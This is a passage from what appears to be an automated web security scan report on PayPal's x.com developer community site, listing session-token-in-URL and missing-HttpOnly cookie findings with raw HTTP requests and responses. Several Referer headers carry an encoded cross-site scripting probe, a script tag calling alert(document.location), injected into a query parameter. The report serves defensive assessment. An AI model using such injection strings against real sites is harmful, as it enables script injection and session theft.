Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_ppv%3D22%3B%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:54:19 GMT
Server: Apache-Coyote/1.1
Content-Type: application/octet-stream
Content-Length: 0
JP: D=1826 t=1313157260442149
Cache-Control: max-age=2016000, public
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


3.49. https://www.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:43:17 GMT
Cache-Control: max-age=60
Content-Type: text/javascript
Content-Length: 654029
JP: D=335 t=1313157137674933
Vary: User-Agent
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...

3.50. https://www.x.com/resources/scripts/gen/5542325f4f5def5174140ea38a0251ad.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /resources/scripts/gen/5542325f4f5def5174140ea38a0251ad.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /resources/scripts/gen/5542325f4f5def5174140ea38a0251ad.js;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:40:21 GMT
Cache-Control: max-age=60
Content-Type: text/javascript
Content-Length: 7809
JP: D=312 t=1313157137653284
Vary: User-Agent
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive

var jiveMenuTimeout;var jiveMenuIndex=-1;var jiveMenuID;function jiveKeypressMenuHandler(f){if(Element.visible(jiveMenuID)){var c=f.which||f.keyCode;var a;switch(c){case Event.KEY_DOWN:a=$(jiveMenuID)
...[SNIP]...

3.51. https://www.x.com/styles/jive-community.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /styles/jive-community.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /styles/jive-community.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:19 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:43:17 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 37406
JP: D=2365 t=1313157140378303
Vary: User-Agent
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

/*
jive-community.css - styles for the community landing page.
*/


.jive-blog-post-message h3 {
   clear: both;
float: none;
}

/* container for use on the community pages */
#jive-b
...[SNIP]...

3.52. https://www.x.com/styles/jive-videomodule.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /styles/jive-videomodule.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /styles/jive-videomodule.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:43:16 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 30950
JP: D=497 t=1313157137926318
Vary: User-Agent
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive

/* videomodule.css */
/* this stylesheet contains browser-specific styles for IE6 (* html) and IE7 (*+html) */

/* Styles for creating and editing a video post */
.jive-video {
clear: both;
bo
...[SNIP]...

3.53. https://www.x.com/themes/paypal/images/favicon.ico

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /themes/paypal/images/favicon.ico

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /themes/paypal/images/favicon.ico;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:27 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 09:46:36 GMT
Etag: "3.0.7-d941befcecba314c9b3d6f0aeeb3fc0c-3638"-gzip
Content-Type: application/octet-stream
Vary: Accept-Encoding,User-Agent
JP: D=1428 t=1313157148459508
Content-Length: 3638
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive

...[SNIP]...

3.54. https://www.x.com/themes/paypal/images/favicon.png

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /themes/paypal/images/favicon.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /themes/paypal/images/favicon.png;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 09:46:36 GMT
Cache-Control: max-age=60
Content-Type: image/png
Vary: Accept-Encoding,User-Agent
JP: D=1195 t=1313157136383873
Content-Length: 967
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

...[SNIP]...

3.55. https://www.x.com/themes/paypal/images/paypal_x_group_logo.png

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /themes/paypal/images/paypal_x_group_logo.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /themes/paypal/images/paypal_x_group_logo.png;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:08 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 09:46:36 GMT
Cache-Control: max-age=60
Content-Type: image/png
Vary: Accept-Encoding,User-Agent
JP: D=715 t=1313158269684052
Content-Length: 1519
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive

...[SNIP]...

3.56. https://www.x.com/themes/paypal/js/custom.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /themes/paypal/js/custom.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /themes/paypal/js/custom.js;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 09:46:36 GMT
Cache-Control: max-age=60
Content-Type: text/javascript
Content-Length: 31770
JP: D=529 t=1313157137684424
Vary: User-Agent
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.dill
...[SNIP]...

4. Cookie without HttpOnly flag set
There are 222 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. https://www.x.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.x.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 12 Aug 2011 01:59:23 GMT
Server: Apache-Coyote/1.1
Location: https://www.x.com/index.jspa
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; Path=/
Set-Cookie: jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; Version=1; Path=/
Vary: Accept-Encoding,User-Agent
JP: D=1446 t=1313114363172657
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: NSC_xxx.y.dpn-443=44ed4e27151d;path=/


4.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/josh/2011/03/29/paypal-integration-resources

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/josh/2011/03/29/paypal-integration-resources HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:41 GMT; Path=/
Vary: User-Agent
JP: D=80251 t=1313157101873077
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /blogs/matt/2010/08/10/retrieving-your-api-credentials

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/matt/2010/08/10/retrieving-your-api-credentials HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:41 GMT; Path=/
Vary: User-Agent
JP: D=155557 t=1313157101339194
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.4. https://www.x.com/community/home

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/home HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:30 GMT; Path=/
Vary: User-Agent
JP: D=85622 t=1313157030208430
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.5. https://www.x.com/community/ppx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323232363b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:24 GMT; Path=/
Vary: User-Agent
JP: D=86365 t=1313157084689243
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.6. https://www.x.com/community/ppx/adaptive_accounts

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/adaptive_accounts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/adaptive_accounts HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031383b31342c323036333b31342c323031373b31342c323031363b31342c323030363b31342c323234363b31342c323031353b31342c323031333b31342c323236393b31342c323232313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:59 GMT; Path=/
Vary: User-Agent
JP: D=100210 t=1313157059307917
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.7. https://www.x.com/community/ppx/adaptive_payments

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/adaptive_payments

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/adaptive_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031303b31342c323031393b31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:31 GMT; Path=/
Vary: User-Agent
JP: D=110512 t=1313157031704201
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.8. https://www.x.com/community/ppx/apps101

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/apps101

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/apps101 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033373b31342c323033303b31342c323032383b31342c323032373b31342c323032393b31342c323036333b31342c323032363b31342c323032303b31342c323031383b31342c323031373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=126957 t=1313157062588323
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.9. https://www.x.com/community/ppx/authentication

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/authentication

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/authentication HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031393b31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:31 GMT; Path=/
Vary: User-Agent
JP: D=114393 t=1313157031269098
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.10. https://www.x.com/community/ppx/businesspayments

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/businesspayments

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

